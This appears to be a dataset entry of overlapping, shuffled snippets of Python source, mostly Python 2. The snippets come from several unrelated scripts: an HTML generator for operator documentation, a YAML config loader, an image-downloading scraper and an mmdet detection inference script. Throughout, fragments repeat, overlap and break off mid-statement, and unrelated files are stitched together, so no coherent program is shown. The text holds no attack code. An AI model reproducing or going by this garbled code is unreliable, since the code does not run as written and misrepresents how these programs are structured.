"( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE =",
"formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output += operator_template.render(Context(operator))",
"all the operators and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output",
"to build operator docs because: ', e def clean_json_string(body): \"\"\" Takes in a",
"open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e:",
"class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{% for input in inputs %}<li><strong>{{ input.name",
"'<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + ( '<td class=\"field-body\"><ul class=\"first simple\">{%",
"recursively. \"\"\" try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index",
"'{% if attrs|length_is:\"0\" %}{% else %}<tr class=\"field-odd field\"><th class=\"field-name\">Attributes:</th>') + ( '<td class=\"field-body\"><ul",
"import json import os import re import codecs from bs4 import BeautifulSoup from",
"def clean_json_string(body): \"\"\" Takes in a string meant to be interpreted as a",
"0: if 'markdown-equation' in comment: soup = BeautifulSoup('<p>' + comment + '</p>', 'lxml')",
"Go through all the operators and construct a new HTML object. operator_template =",
"(generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists in %s' % operators_json_path)",
"generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go through",
"operator docs because: ', e def clean_json_string(body): \"\"\" Takes in a string meant",
"import os import re import codecs from bs4 import BeautifulSoup from django.template import",
"generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file. with open(operators_api_path) as raw_operators_api_file:",
"as a JSON object, and removes faulty characters, recursively. \"\"\" try: return json.loads(body)",
"str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column')) return clean_json_string( body[:faulty_character_index] +",
"try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search(",
"( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') +",
"def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file. with open(operators_api_path) as",
"field-list\">') + ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr",
"lang) print 'Saving operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with",
"'Failed to build operator docs because: ', e def clean_json_string(body): \"\"\" Takes in",
"{% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + (",
"'<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') + ( '<th class=\"field-name\">Inputs:</th>') + (",
"operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does not exists",
"string meant to be interpreted as a JSON object, and removes faulty characters,",
"for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %}",
"e: print 'Failed to build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir,",
"JSON object, and removes faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError,",
"= soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7],",
"'</tbody>') + ( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER = (",
"== 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') +",
"soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8'",
"because: ', e def generate_operators_page_with_path(operators_api_path, destination_dir): try: # Open the operators API file.",
"'</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') + ( '</dl>') +",
"'</dl>') + ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">',",
"output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path): raise Exception('operators.json does",
"+ ( '</tbody>') + ( '</table></dd>') + ( '</dl>') + ( '</div>') OPERATORS_WRAPPER",
"Exception, e: print 'Failed to build operator docs because: ', e def generate_operators_page(raw_operators_api,",
"operators.html to %s' % operators_output_path if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8')",
"control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column')) return clean_json_string( body[:faulty_character_index] + body[faulty_character_index+1:])",
"if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char (?P<column>\\d+)', str(e)).group('column')) return clean_json_string( body[:faulty_character_index]",
"}}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even field\"><th class=\"field-name\">Outputs:</th>') +",
"in inputs %}<li><strong>{{ input.name }}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif",
"if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment }}</li>{% endfor",
"'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs",
"if not os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception,",
"destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to build operator docs because:",
"+ ( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd",
"return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'): faulty_character_index = int(re.search( 'char",
"}}</strong> {% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate ==",
"{% if input.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if input.intermediate == 1",
"meant to be interpreted as a JSON object, and removes faulty characters, recursively.",
"os.path.exists(os.path.dirname(operators_output_path)): os.makedirs(os.path.dirname(operators_output_path)) with codecs.open(operators_output_path, 'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print",
"class=\"field-body\"><ul class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable",
"class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">') + (",
"'w', 'utf-8') as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator",
"endfor %}</ul></td>') + ( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>')",
"if output.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>')",
"simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated == 1",
"import Template, Context import markdown from deploy.utils import reserve_formulas, MARKDOWN_EXTENSIONS OPERATOR_TEMPLATE = '<div",
"{{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') + ( '<tr class=\"field-even field\"><th",
"for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html",
"because: ', e def clean_json_string(body): \"\"\" Takes in a string meant to be",
"\"\"\" Takes in a string meant to be interpreted as a JSON object,",
"reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) > 0: if 'markdown-equation'",
"generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed to build operator docs",
"endif %}: {{ attr.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>{% endif %}') +",
"operators_output = '' try: operators = clean_json_string(raw_operators_api) # Go through all the operators",
"%}(<em>Intermediate</em>) {% endif %}: {{ output.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') +",
"if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>')",
"'%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path = OPERATORS_JSON_PATH_TEMPLATE % (generated_docs_dir) if not os.path.exists(operators_json_path):",
"class=\"first simple\">{% for output in outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable ==",
"generated_docs_dir) except Exception, e: print 'Failed to build operator docs because: ', e",
"characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e: if str(e).startswith('Invalid control character'):",
"the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir,",
"markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders: equation.string = formula_map[equation.get('id')] comment = unicode(",
"to build operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output =",
"Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map",
"not exists in %s' % operators_json_path) generate_operators_page_with_path(operators_json_path, generated_docs_dir) except Exception, e: print 'Failed",
"as operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs because:",
"}}</strong> (<em>Duplicable</em>){% if attr.generated == 1 %} (<em>Generated</em>) {% endif %}: {{ attr.comment",
"'' try: operators = clean_json_string(raw_operators_api) # Go through all the operators and construct",
"class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong> (<em>Duplicable</em>){% if attr.generated",
"= ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE",
"'</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try: operators_json_path =",
"{} comment = reserve_formulas(operator['comment'], formula_map, only_reserve_double_dollar=True) comment = markdown.markdown(comment, extensions=MARKDOWN_EXTENSIONS) #if len(operator_comment_line) >",
"object, and removes faulty characters, recursively. \"\"\" try: return json.loads(body) except ValueError, e:",
"%}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor %}</ul></td>') + ( '</tr>') +",
"{% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate == 1",
"verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir,",
"docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators",
"%}{% if input.intermediate == 1 %}(<em>Intermediate</em>) {% endif %}: {{ input.comment }}</li>{% endfor",
"operator docs because: ', e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try:",
"lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print 'Saving operators.html to %s' %",
"e def generate_operators_page(raw_operators_api, destination_dir, lang_dirs): operators_output = '' try: operators = clean_json_string(raw_operators_api) #",
"and construct a new HTML object. operator_template = Template(OPERATOR_TEMPLATE) operators_output += OPERATORS_WRAPPER[0] for",
"+ ( '</tr>{% endif %}') + ( '</tbody>') + ( '</table></dd>') + (",
"docs because: ', e def clean_json_string(body): \"\"\" Takes in a string meant to",
"class=\"section\" id=\"operators\">', '</div>{% endverbatim %}</div>' ) OPERATORS_JSON_PATH_TEMPLATE = '%s/en/html/operators.json' def generate_operators_docs_with_generated_doc_dir(generated_docs_dir, output_dir_name): try:",
"+ ( '<h2>{{ type }}</h2>') + ( '<dl class=\"function\"><dd>{{ comment|safe }}') + (",
"operators_output_file: operators_output_file.write(operators_output) except Exception, e: print 'Failed to build operator docs because: ',",
"outputs %}<li><strong>{{ output.name }}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{%",
"try: # Open the operators API file. with open(operators_api_path) as raw_operators_api_file: raw_operators_api =",
"equation.string = formula_map[equation.get('id')] comment = unicode( str(soup.select('body')[0])[6:-7], 'utf-8' ) operator['comment'] = comment operators_output",
"+ ( '<td class=\"field-body\"><ul class=\"first simple\">{% for attr in attrs %}<li><strong>{{ attr.name }}</strong>",
"+ ( '</div>') OPERATORS_WRAPPER = ( '<div class=\"document\">{% verbatim %}<h1>Operators</h1><div class=\"section\" id=\"operators\">', '</div>{%",
"raw_operators_api_file: raw_operators_api = raw_operators_api_file.read() generate_operators_page(raw_operators_api, destination_dir, ['en/html', 'cn/html']) except Exception, e: print 'Failed",
"OPERATORS_WRAPPER[0] for operator in operators: if 'comment' in operator: formula_map = {} comment",
"( '<colgroup><col class=\"field-name\"><col class=\"field-body\"></colgroup>') + ( '<tbody valign=\"top\">') + ( '<tr class=\"field-odd field\">')",
"BeautifulSoup('<p>' + comment + '</p>', 'lxml') markdown_equation_placeholders = soup.select('.markdown-equation') for equation in markdown_equation_placeholders:",
"+= OPERATORS_WRAPPER[1] for lang in lang_dirs: operators_output_path = '%s/%s/operators.html' % (destination_dir, lang) print",
"}}</strong> {% if output.duplicable == 1 %}(<em>Duplicable</em>) {% endif %}{% if output.intermediate =="
] |
[
"def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env): if",
"load('context.yml') _configs = {} def get_config(env): if env not in _configs: _configs[env] =",
"yaml from pkg_resources import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return",
"load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env): if env not in",
"if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return _configs[env] def",
"return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env): if env not",
"_configs = {} def get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env))",
"not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return _configs[env] def get_cluster_name(env): return",
"with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env =",
"import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name):",
"from pkg_resources import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file)",
"get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return _configs[env]",
"load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env",
"as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs =",
"pkg_resources import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def",
"resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml')",
"in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return _configs[env] def get_cluster_name(env): return _env[env][\"cluster\"]",
"import yaml from pkg_resources import resource_stream def load(filename): with resource_stream(__name__, filename) as config_file:",
"= load('context.yml') _configs = {} def get_config(env): if env not in _configs: _configs[env]",
"_env = load('context.yml') _configs = {} def get_config(env): if env not in _configs:",
"yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env):",
"return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def",
"= {} def get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\",",
"def get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return",
"config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {}",
"{} def get_config(env): if env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {}))",
"def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name))",
"load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs = {} def get_config(env): if env",
"resource_stream def load(filename): with resource_stream(__name__, filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return",
"filename) as config_file: return yaml.load(config_file) def load_cluster_config(name): return load('{0}.yml'.format(name)) _env = load('context.yml') _configs",
"env not in _configs: _configs[env] = load_cluster_config(get_cluster_name(env)) _configs[env].update(_env[env].get(\"override\", {})) return _configs[env] def get_cluster_name(env):"
] |
[
"def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for",
"fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl",
"fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName,",
"import style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs =",
"style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print",
"targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl +",
"not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read()",
"open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold',",
"else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!'",
"from bs4 import BeautifulSoup import style def getImg(url): response = requests.get(url) soup =",
"response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in",
"+ fileName): output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close()",
"os from bs4 import BeautifulSoup import style def getImg(url): response = requests.get(url) soup",
"is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + '",
"style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img')",
"getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img",
"arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName,",
"print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!' downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg',",
"print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else:",
"in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) -",
"output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info]",
"- 1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+')",
"import BeautifulSoup import style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml')",
"= soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/')",
"imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1]",
"print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if",
"', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!' downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg', '/Users/zhengmeiyu/Downloads/') getImg('http://22mm.xiuna.com/mm/qingliang/')",
"urllib2, os from bs4 import BeautifulSoup import style def getImg(url): response = requests.get(url)",
"imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output =",
"= open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ',",
"BeautifulSoup import style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs",
"imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr =",
"fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ', mode='bold',",
"bs4 import BeautifulSoup import style def getImg(url): response = requests.get(url) soup = BeautifulSoup(response.text,",
"soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def",
"soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName",
"style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') +",
"' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') +",
"= requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs:",
"'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr",
"'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName,",
"arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName):",
"style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is here!' downloadImg('http://posters.imdb.cn/ren-pp/0000701/CjR3AsiaP_1190290948.jpg', '/Users/zhengmeiyu/Downloads/')",
"urllib, urllib2, os from bs4 import BeautifulSoup import style def getImg(url): response =",
"1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+') imgData",
"os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData)",
"imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan')",
"downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple') + ' is",
"import requests, urllib, urllib2, os from bs4 import BeautifulSoup import style def getImg(url):",
"+ fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green')",
"+ style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red')",
"BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl):",
"for img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName =",
"+ ' is downloaded.' else: print style.use_style('[warning] ', mode='bold', fore='red') + style.use_style(fileName, fore='purple')",
"= imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output",
"mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning] ',",
"output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is",
"if not os.path.exists(targetUrl + fileName): output = open(targetUrl + fileName, 'wb+') imgData =",
"= urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') +",
"output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.'",
"downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if not os.path.exists(targetUrl",
"', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + ' is downloaded.' else: print style.use_style('[warning]",
"img in imgs: print(img.get('src')) def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr)",
"= BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src')) def downloadImg(imgUrl,",
"= arr[len(arr) - 1] if not os.path.exists(targetUrl + fileName): output = open(targetUrl +",
"requests, urllib, urllib2, os from bs4 import BeautifulSoup import style def getImg(url): response",
"def downloadImg(imgUrl, targetUrl): arr = imgUrl.split('/') fileName = arr[len(arr) - 1] if not",
"fileName): output = open(targetUrl + fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print",
"urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') + style.use_style(fileName, fore='cyan') + '",
"fileName, 'wb+') imgData = urllib2.urlopen(imgUrl).read() output.write(imgData) output.close() print style.use_style('[info] ', mode='bold', fore='green') +",
"requests.get(url) soup = BeautifulSoup(response.text, 'lxml') imgs = soup.find_all('img') for img in imgs: print(img.get('src'))"
] |
[
"checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path",
"1) : img = sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0]",
"score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file) if __name__ == '__main__': main()",
"* debug = False # only for debug def load_result(): lines = \"\"",
"sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img,",
"= path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path +",
"inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img,",
"for debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines",
"def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read()",
"with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return lines def main(): #detection",
"False # only for debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\")",
"import sys from myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import",
"def main(): #detection debug if debug is True: print(load_result()) return path = sys.path[0]",
"print(load_result()) return path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint",
"'/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) #",
"return path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint =",
"+ '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES)",
"# show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file) if",
"> 1) : img = sys.argv[1] print(img) result = inference_detector(model, img) out_file =",
"= inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05)",
"if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result = inference_detector(model, img) out_file",
": img = sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] +",
"osp from app import * debug = False # only for debug def",
"= sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path +",
"img = sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\"",
"+ \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" %",
"f: lines = f.read() return lines def main(): #detection debug if debug is",
"lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return lines",
